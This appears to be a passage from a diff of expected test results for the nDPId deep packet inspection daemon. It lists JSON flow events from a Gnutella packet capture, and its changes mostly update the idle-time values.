+00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90737,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.89.249.8","src_port":50290,"dst_port":50649,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90737,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.89.249.8","src_port":50290,"dst_port":50649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":552011,"flow_last_seen":552011,"flow_idle_time":120000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"154.3.42.209","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72852,"flow_last_seen":491978,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.250.99.158","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":72852,"flow_last_seen":491978,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.250.99.158","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.123.202.175","src_port":50237,"dst_port":37910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.123.202.175","src_port":50237,"dst_port":37910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75358,"flow_last_seen":84388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50264,"dst_port":48380,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75358,"flow_last_seen":84388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50264,"dst_port":48380,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.123.202.175","src_port":50237,"dst_port":37910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.123.202.175","src_port":50237,"dst_port":37910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75358,"flow_last_seen":84388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50264,"dst_port":48380,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":75358,"flow_last_seen":84388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50264,"dst_port":48380,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":433136,"flow_last_seen":433136,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"208.92.106.151","src_port":28681,"dst_port":32476,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":433136,"flow_last_seen":433136,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"208.92.106.151","src_port":28681,"dst_port":32476,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71203,"flow_last_seen":80232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50244,"dst_port":63978,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71203,"flow_last_seen":80232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50244,"dst_port":63978,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71204,"flow_last_seen":80232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":50247,"dst_port":51560,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71204,"flow_last_seen":80232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":50247,"dst_port":51560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71203,"flow_last_seen":80232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50244,"dst_port":63978,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71203,"flow_last_seen":80232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50244,"dst_port":63978,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71204,"flow_last_seen":80232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":50247,"dst_port":51560,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":71204,"flow_last_seen":80232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":50247,"dst_port":51560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":491496,"flow_last_seen":491496,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"23.19.141.110","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":491496,"flow_last_seen":491496,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"23.19.141.110","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":312956,"flow_last_seen":553212,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.159.27.22","src_port":28681,"dst_port":17563,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -4075,54 +4075,54 @@ 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82061,"flow_last_seen":493284,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.99.164.4","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":551702,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"50.58.238.149","src_port":28681,"dst_port":6599,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":551702,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"50.58.238.149","src_port":28681,"dst_port":6599,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90738,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50292,"dst_port":11603,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90738,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50292,"dst_port":11603,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70172,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.138.129.252","src_port":50243,"dst_port":27962,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70172,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.138.129.252","src_port":50243,"dst_port":27962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90738,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50292,"dst_port":11603,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90738,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50292,"dst_port":11603,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70172,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.138.129.252","src_port":50243,"dst_port":27962,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70172,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.138.129.252","src_port":50243,"dst_port":27962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.239.213.146","src_port":28681,"dst_port":21750,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.239.213.146","src_port":28681,"dst_port":21750,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":82058,"flow_last_seen":551892,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.227.162.150","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":82058,"flow_last_seen":551892,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.227.162.150","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73299,"flow_last_seen":82326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":50255,"dst_port":52165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73299,"flow_last_seen":82326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":50255,"dst_port":52165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73299,"flow_last_seen":82326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":50255,"dst_port":52165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73299,"flow_last_seen":82326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":50255,"dst_port":52165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":82066,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.179.98.234","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":82066,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.179.98.234","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
